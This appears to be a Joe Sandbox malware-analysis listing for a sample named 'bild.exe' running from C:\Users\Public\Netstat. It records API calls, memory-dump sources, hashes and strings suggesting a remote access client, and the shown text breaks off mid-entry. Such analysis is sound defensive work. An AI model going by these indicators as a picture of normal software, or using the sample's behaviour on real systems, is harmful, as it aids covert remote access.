Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6C61B898,00000000,?,?,?,6C5DDA7F,?,00000000), ref: 6C5DA503
InterlockedExchange.KERNEL32(?,00000000), ref: 6C5DA568
Sleep.KERNEL32(00000000,?,6C5DDA7F,?,00000000), ref: 6C5DA581
LeaveCriticalSection.KERNEL32(6C61B898,00000000), ref: 6C5DA5B3

Memory Dump Source

Source File: 00000006.00000002.3900030829.000000006C5D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000006.00000002.3900014293.000000006C5D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3900058825.000000006C610000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3900075671.000000006C619000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3900091633.000000006C61A000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3900091633.000000006C61E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3900123306.000000006C620000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c5d0000_bild.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterExchangeInterlockedLeaveSleep
String ID:
API String ID: 4212191310-0
Opcode ID: 23d066f657de01694c948e18dc5c90fdd60513284a534c6f4a9dad37e088d223
Instruction ID: 6ce86c6274da148b161707994638ed71208ef8689c4a0a7f58997b6c95419f75
Opcode Fuzzy Hash: 23d066f657de01694c948e18dc5c90fdd60513284a534c6f4a9dad37e088d223
Instruction Fuzzy Hash: 8C21A1B2A00300EFDF119B1ECC8269BB7B8ABC631AF160527D85693E51D771B9408B59

Function 00A51020 Relevance: 6.1, APIs: 4, Instructions: 55COMMON

Download Yara Rule

APIs

GetCommandLineA.KERNEL32 ref: 00A51027
GetStartupInfoA.KERNEL32(?), ref: 00A5107B
GetModuleHandleA.KERNEL32(00000000,00000000,00000000,?), ref: 00A51096
ExitProcess.KERNEL32 ref: 00A510A3

Memory Dump Source

Source File: 00000006.00000002.3898205616.0000000000A51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000006.00000002.3898187027.0000000000A50000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3898223938.0000000000A52000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_a50000_bild.jbxd

Yara matches

Similarity

API ID: CommandExitHandleInfoLineModuleProcessStartup
String ID:
API String ID: 2164999147-0
Opcode ID: 490011d6a473ccbfc1b4b410c48ca93b1d01c888060ddf8bba764e8162775bd1
Instruction ID: 742da974f26c7489b430c7fe5c9c0d2b4fc852702af21e853dd9a1e15b93d99a
Opcode Fuzzy Hash: 490011d6a473ccbfc1b4b410c48ca93b1d01c888060ddf8bba764e8162775bd1
Instruction Fuzzy Hash: 0A11AD204083C45AEB319FA089487FABFA5BB22387F640048ECD6961C6D2764CCFC7A5

Function 110306E7 Relevance: 6.0, APIs: 4, Instructions: 36synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000001F4), ref: 110306FC
CloseHandle.KERNEL32(?), ref: 11030709
FreeLibrary.KERNEL32(?), ref: 11030714
CloseHandle.KERNEL32(00000000), ref: 1103071B

Memory Dump Source

Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_bild.jbxd

Yara matches

Similarity

API ID: CloseHandle$FreeLibraryObjectSingleWait
String ID:
API String ID: 1314093303-0
Opcode ID: 7d2e314c4a79abf06013014507abe82da34b4e69185c6a4a9ad4d68e1235ff59
Instruction ID: 8e76f7fb4e107f93cb89770177b2081f40004907d07b5dfd0c3c9c847909df3d
Opcode Fuzzy Hash: 7d2e314c4a79abf06013014507abe82da34b4e69185c6a4a9ad4d68e1235ff59
Instruction Fuzzy Hash: A7F08135E1425ADFE714DF60D889BADF774FB88319F0002A9D82A52180DF355940CB50

Function 6C5D5C90 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON

Download Yara Rule

APIs

ioctlsocket.WSOCK32(939E34B3,4004667F,00000000,a3^l), ref: 6C5D5D1F
select.WSOCK32(00000001,?,00000000,?,00000000,939E34B3,4004667F,00000000,a3^l), ref: 6C5D5D62

Strings

a3^l, xrefs: 6C5D5D0E

Memory Dump Source

Source File: 00000006.00000002.3900030829.000000006C5D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000006.00000002.3900014293.000000006C5D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3900058825.000000006C610000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3900075671.000000006C619000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3900091633.000000006C61A000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3900091633.000000006C61E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3900123306.000000006C620000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c5d0000_bild.jbxd

Yara matches

Similarity

API ID: ioctlsocketselect
String ID: a3^l
API String ID: 1457273030-3838789914
Opcode ID: 358081ceb7d0a1c4800ffff39fb90aaee65c8c98909374f7e997905dfc459040
Instruction ID: 1ce468167fe70463d1bb97893f50ce00efcffce07f53c34d7d8f41d98ebfc4fe
Opcode Fuzzy Hash: 358081ceb7d0a1c4800ffff39fb90aaee65c8c98909374f7e997905dfc459040
Instruction Fuzzy Hash: 4B213370A013188BEB28DF18CD547DDB7B9EF84304F4081DAA80957681D7705F95DF90

Function 11143C20 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(1102947F,?,11143E73,?), ref: 11143C2C
GetModuleFileNameA.KERNEL32(00000000,C:\Users\Public\Netstat\bild.exe,00000104,?,11143E73,?), ref: 11143C49

Strings

C:\Users\Public\Netstat\bild.exe, xrefs: 11143C34, 11143C42

Memory Dump Source

Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_bild.jbxd

Yara matches

Similarity

API ID: CurrentFileModuleNameProcess
String ID: C:\Users\Public\Netstat\bild.exe
API String ID: 2251294070-3316297413
Opcode ID: 723324e2a123dfbea80ddcbfb8a880b064ecb9608f963ee43b1e571dd00f4a9e
Instruction ID: b9aa28b4973dc8f7500fb142756b1fa860f28402029a3e5f5efe4e67c4e883a6
Opcode Fuzzy Hash: 723324e2a123dfbea80ddcbfb8a880b064ecb9608f963ee43b1e571dd00f4a9e
Instruction Fuzzy Hash: F811E7747282235BE7149F76C994719F7A5AB40B5DF20403EE819C76C4DB71F845C744

Function 1110F4A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26COMMONLIBRARYCODE

Download Yara Rule

APIs

_malloc.LIBCMT ref: 1110F4A9

Part of subcall function 11162B51: __FF_MSGBANNER.LIBCMT ref: 11162B6A
Part of subcall function 11162B51: __NMSG_WRITE.LIBCMT ref: 11162B71
Part of subcall function 11162B51: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162B96

_memset.LIBCMT ref: 1110F4D2

Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509

Strings

..\ctl32\Refcount.cpp, xrefs: 1110F4BC

Memory Dump Source

Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_bild.jbxd

Yara matches

Similarity

API ID: AllocateErrorExitHeapLastMessageProcess_malloc_memsetwsprintf
String ID: ..\ctl32\Refcount.cpp
API String ID: 2803934178-2363596943
Opcode ID: 1dad7423e7d09c371aaf82e5f4f0c79299b8a2cfda0255715acc90ffe98602aa
Instruction ID: 747f5be640ff5df7f7be77ac0748be8e5b1ae2afb2ba592a3adef8646797d69b
Opcode Fuzzy Hash: 1dad7423e7d09c371aaf82e5f4f0c79299b8a2cfda0255715acc90ffe98602aa
Instruction Fuzzy Hash: B5E0C23AE4013933C112258A2C03FDBF69C8BD19FCF060021FE0CAA201E586B55181E6

Function 11014FD0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(\\.\NSWFPDrv,80000000,00000000,00000000,00000003,40000000,00000000,00000001,1102EFB6,MiniDumpType,000000FF,00000000,00000000,?,?,View), ref: 11014FE7
CloseHandle.KERNEL32(00000000,?,?,View,Client,Bridge), ref: 11014FF8

Strings

\\.\NSWFPDrv, xrefs: 11014FE2

Memory Dump Source

Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_bild.jbxd

Yara matches

Similarity

API ID: CloseCreateFileHandle
String ID: \\.\NSWFPDrv
API String ID: 3498533004-85019792
Opcode ID: f0badf7843dd101c9c7a596aad23f33c11cadc83e0c29f65da520d4fe63b43e1
Instruction ID: 0b573536b28af4079515d3142ca801f5deca53cbeb6a996f0a1660ae0aa1d84a
Opcode Fuzzy Hash: f0badf7843dd101c9c7a596aad23f33c11cadc83e0c29f65da520d4fe63b43e1
Instruction Fuzzy Hash: A9D0C971A051387AF23416B66C4CFC7AD09DF06BB5F210264B53DE11D886104C41C2F1

Function 1115BDE0 Relevance: 4.7, APIs: 3, Instructions: 158COMMON

Download Yara Rule

APIs

_calloc.LIBCMT ref: 1115BE03

Memory Dump Source

Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_bild.jbxd

Yara matches

Similarity

API ID: _calloc
String ID:
API String ID: 1679841372-0
Opcode ID: 9cedd041eecb3df7698fbc33d80b44fc007d69f78d2f5524ab9bd2bf2492814b
Instruction ID: 0024421513bb2e1abb717dbf2ce3cdefbb73aa1ee3cdb3a5feae03928f974db8
Opcode Fuzzy Hash: 9cedd041eecb3df7698fbc33d80b44fc007d69f78d2f5524ab9bd2bf2492814b
Instruction Fuzzy Hash: 8C519E7560020AAFDB50CF68CC81FAAB7A6FF8A704F148459F929DB280D771E901CF95

Function 6C5D8FB0 Relevance: 4.6, APIs: 3, Instructions: 57networkCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 6C5D8FE4
getsockname.WSOCK32(?,?,00000010,?,03682EB0,?), ref: 6C5D9005
WSAGetLastError.WSOCK32(?,?,00000010,?,03682EB0,?), ref: 6C5D902E

Part of subcall function 6C5D5840: inet_ntoa.WSOCK32(00000080,?,00000000,?,6C5D8F91,00000000,00000000,6C61B8DA,?,00000080), ref: 6C5D5852

Memory Dump Source

Source File: 00000006.00000002.3900030829.000000006C5D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000006.00000002.3900014293.000000006C5D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3900058825.000000006C610000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3900075671.000000006C619000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3900091633.000000006C61A000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3900091633.000000006C61E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3900123306.000000006C620000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c5d0000_bild.jbxd

Yara matches

Similarity

API ID: ErrorLast_memsetgetsocknameinet_ntoa
String ID:
API String ID: 3066294524-0
Opcode ID: dd29d924ea5789e5c8a4c51635ed0a87f0c0d647ba8196720499a5bbafbc1bab
Instruction ID: e89b7acffd834b5c6dc0d878bfb8d5a1f452ac72541fb4dbe9261f2be5f4a8f5
Opcode Fuzzy Hash: dd29d924ea5789e5c8a4c51635ed0a87f0c0d647ba8196720499a5bbafbc1bab
Instruction Fuzzy Hash: 751151B1E00108AFCB04DFA9DC419FFB7B8EB88214F01456ADC15E7240E770AE158B91

Function 11111430 Relevance: 4.5, APIs: 3, Instructions: 49COMMON

Download Yara Rule

APIs

GetSystemDirectoryA.KERNEL32(?,00000104), ref: 1111145A
__wsplitpath.LIBCMT ref: 11111475

Part of subcall function 11169044: __splitpath_helper.LIBCMT ref: 11169086

GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 111114A9

Memory Dump Source

Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_bild.jbxd

Yara matches

Similarity

API ID: DirectoryInformationSystemVolume__splitpath_helper__wsplitpath
String ID:
API String ID: 1847508633-0
Opcode ID: 7498e584b69856d4904a5e87c0faea6464729445070a8fc0c411536d822b12a4
Instruction ID: 71a9510f599fa1c136cb45ff21797ad5c5790827a759e4d2b52c0b71367846c8
Opcode Fuzzy Hash: 7498e584b69856d4904a5e87c0faea6464729445070a8fc0c411536d822b12a4
Instruction Fuzzy Hash: 34116175A4021DABEB14DF94CD42FE9F378AB48B04F404199E7246B1C0E7B12A48CB65

Function 1109E9E0 Relevance: 4.5, APIs: 3, Instructions: 29COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00020008,00000000,?,?,110F7D14,00000001,111417B8,_debug,TraceCopyData,00000000,00000000,?,?,00000000,00000000), ref: 1109EA01
OpenProcessToken.ADVAPI32(00000000,?,?,110F7D14,00000001,111417B8,_debug,TraceCopyData,00000000,00000000,?,?,00000000,00000000), ref: 1109EA08

Part of subcall function 1109E910: GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,?,1102FCB2,?,00000000), ref: 1109E948
Part of subcall function 1109E910: GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),?,00000001,00000001), ref: 1109E964
Part of subcall function 1109E910: AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,0106F958,0106F958,0106F958,0106F958,0106F958,0106F958,0106F958,111EEB64,?,00000001,00000001), ref: 1109E990
Part of subcall function 1109E910: EqualSid.ADVAPI32(?,0106F958,?,00000001,00000001), ref: 1109E9A3

CloseHandle.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 1109EA27

Memory Dump Source

Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_bild.jbxd

Yara matches

Similarity

API ID: Token$InformationProcess$AllocateCloseCurrentEqualHandleInitializeOpen
String ID:
API String ID: 2256153495-0
Opcode ID: 3278d9adbe4d3509b3b3548b9dad78e2718189f4cc0d765404142b0664a012dd
Instruction ID: 36b54363b319bb335bc5da0d0e9bdd0405b18079b131e91390d3ecc07929186c
Opcode Fuzzy Hash: 3278d9adbe4d3509b3b3548b9dad78e2718189f4cc0d765404142b0664a012dd
Instruction Fuzzy Hash: DCF05E78A15328EFD709CFF5D88482EB7A9AF08208700447DF629D3205E631EE009F50

Function 1110F720 Relevance: 3.8, APIs: 3, Instructions: 57COMMONLIBRARYCODE

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32(111F0908,F3EE1E80,?,?,?,?,-00000001,11182078,000000FF,?,1110F7F8,00000001,?,11169683,?), ref: 1110F754
EnterCriticalSection.KERNEL32(111F0908,F3EE1E80,?,?,?,?,-00000001,11182078,000000FF,?,1110F7F8,00000001,?,11169683,?), ref: 1110F770
LeaveCriticalSection.KERNEL32(111F0908,?,?,?,?,-00000001,11182078,000000FF,?,1110F7F8,00000001,?,11169683,?), ref: 1110F7B8

Memory Dump Source

Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_bild.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterInitializeLeave
String ID:
API String ID: 3991485460-0
Opcode ID: de9cc3b242b9749762f72f1a9abe3d064888d8cc99300df6bb387b99347c91a8
Instruction ID: 724175da6b3b5eb63f60f43096b8b9410b0df93e13cce3f4766159a849acac97
Opcode Fuzzy Hash: de9cc3b242b9749762f72f1a9abe3d064888d8cc99300df6bb387b99347c91a8
Instruction Fuzzy Hash: 3D11C675A0061AAFE700CF65CD85B5BF7A9FB88714F010129E829E3340F7359808CB92

Function 11068950 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 96libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(00000000,00000000), ref: 11068A12

Strings

??CTL32.DLL, xrefs: 110689D3

Memory Dump Source

Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_bild.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: ??CTL32.DLL
API String ID: 1029625771-2984404022
Opcode ID: f114da26ba1a202df3ee97640f196ffb6169a957819133968d89773a25347f90
Instruction ID: 38d720fc7c26638894156a2f8924bac31edb6b50614c34829f37a9a02c5b1e22
Opcode Fuzzy Hash: f114da26ba1a202df3ee97640f196ffb6169a957819133968d89773a25347f90
Instruction Fuzzy Hash: 5831F5B2A04781DFE711CF59DC40B5AF7E8FB45724F0482AAE92897380E735A900CB92

Function 6C5D5840 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 76COMMON

Download Yara Rule

APIs

